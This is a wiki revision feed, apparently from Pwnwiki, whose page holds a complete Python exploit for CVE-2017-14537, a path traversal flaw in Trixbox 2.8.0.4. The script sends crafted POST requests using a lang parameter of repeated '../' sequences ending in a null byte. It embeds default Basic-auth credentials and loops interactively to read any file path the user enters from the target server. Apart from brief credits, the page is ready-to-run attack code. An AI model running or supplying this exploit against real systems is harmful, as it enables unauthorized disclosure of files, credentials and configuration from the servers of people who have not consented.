https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E
CVE-2017-14537 Trixbox 2.8.0.4 目錄遍歷漏洞 - Revision history
2026-04-15T02:54:04Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&diff=3601&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.word..."
2021-05-28T09:47:32Z
<p>Created page with "==EXP== <pre> # Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.word..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal<br />
# Date: 27.05.2021<br />
# Exploit Author: Ron Jost (Hacker5preme)<br />
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/<br />
# Credits to: Sachin Wagh<br />
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/<br />
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download<br />
# Version: 2.8.0.4<br />
# Tested on: Xubuntu 20.04<br />
# CVE: CVE-2017-14537<br />
<br />
'''<br />
Description:<br />
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the<br />
lang parameter to /maint/modules/home/index.php.<br />
'''<br />
<br />
<br />
'''<br />
Import required modules:<br />
'''<br />
import requests<br />
import sys<br />
import urllib.parse<br />
<br />
<br />
'''<br />
User-Input:<br />
'''<br />
target_ip = sys.argv[1]<br />
target_port = sys.argv[2]<br />
<br />
<br />
'''<br />
Construct malicious request:<br />
'''<br />
# Constructing header:<br />
header = {<br />
'Host': target_ip,<br />
'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',<br />
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br />
'Accept-Encoding': 'gzip, deflate',<br />
'Connection': 'keep-alive',<br />
'Cookie': 'template=classic; lng=en; lng=en',<br />
'Upgrade-Insecure-Requests': '1',<br />
'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',<br />
}<br />
<br />
# Constructing malicious link (payload):<br />
base_link = 'http://' + target_ip + ':' + target_port<br />
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'<br />
base_link_addon_3 = '%00english'<br />
print('')<br />
base_link_addon_2 = input('Input the filepath or input EXIT: ')<br />
<br />
<br />
<br />
'''<br />
EXPLOIT:<br />
'''<br />
while base_link_addon_2 != 'EXIT':<br />
base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')<br />
exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3<br />
print('')<br />
exploit = requests.post(exploit_link, headers=header)<br />
print('Contents of ' + base_link_addon_2 + ':')<br />
for data in exploit.iter_lines():<br />
data = data.decode('utf-8')<br />
if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':<br />
print(data)<br />
else:<br />
break<br />
print('')<br />
base_link_addon_2 = input('Input the filepath or input EXIT: ')<br />
</pre></div>
Pwnwiki